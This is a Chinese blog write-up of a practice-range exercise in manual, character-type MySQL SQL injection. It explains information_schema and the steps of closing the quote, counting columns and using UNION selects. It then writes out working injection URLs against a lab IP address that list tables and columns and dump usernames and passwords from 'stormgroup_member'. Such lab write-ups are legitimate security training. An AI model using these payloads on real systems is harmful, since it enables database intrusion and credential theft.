mysql注入靶场_靶场练习-墨者学院-sql注入- 手工注入漏洞测试(MySQL数据库-字符型)...

背景知识

1.Mysql的数据结构

mysql中有一个information_schema数据库,用于维护mysql中的其他数据库信息。

其中的tables表的TABLE_SCHEMA字段为库名,TABLE_NAME字段为表名;

columns表的TABLE_SCHEMA字段为所属的数据库,TABLE_NAME字段为表名,COLUMN_NAME字段为列名。

2.手工注入方法。

是否存在过滤,是否可绕过。

是否可通过页面变化或者时间变化,判断是否存在注入点。

判断注入类型,字符型还是数字型,字符型需要构造闭合。

通过order by 判断列数。

在找到注入点,判断出union 可用的字段后,判断出所用的数据库名字和用户名字,然后再information_schema中查看对应的数据库(table_schema)有哪几个表(table_name),然后在columns查看对应的表有哪些字段。

3.md5加解密。

思路

1.判断是否存在注入点。字符型,通过‘构造闭合。

d0d4b391e6287314106b96f4992fd663.png

输入’页面发生变化

04c9b048a96ecb2a4b07114287573f7a.png

5416558cd13a9267f4742009fe8af24a.png

2.判断列数

ca9972e07d60d3141d27decb6d1957ce.png

249e869e8917d10bc4ed10ac8c1a43a1.png

3.判断位置,数据库名,用户名

bd2209e121840126fb22544586ce21c9.png

7dd6a66b45d770f30b220f14cd16a244.png

4.查询数据库中的表名

http://219.153.49.228:40812/new_list.php?id=' union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()--+

323129e378fe62d2e3c421d38c7844ed.png

5.查询数据库的字段名

http://219.153.49.228:40812/new_list.php?id=' union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema=database() and table_name='stormgroup_member'--+

6f6eb3a08bba4637d5a35f7455de18a5.png

6.查询数据库字段对应的值

http://219.153.49.228:40812/new_list.php?id=' union select 1,group_concat(name),group_concat(password),4 from stormgroup_member--+

8ddf927b64069588b3b02b7232c099f5.png

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值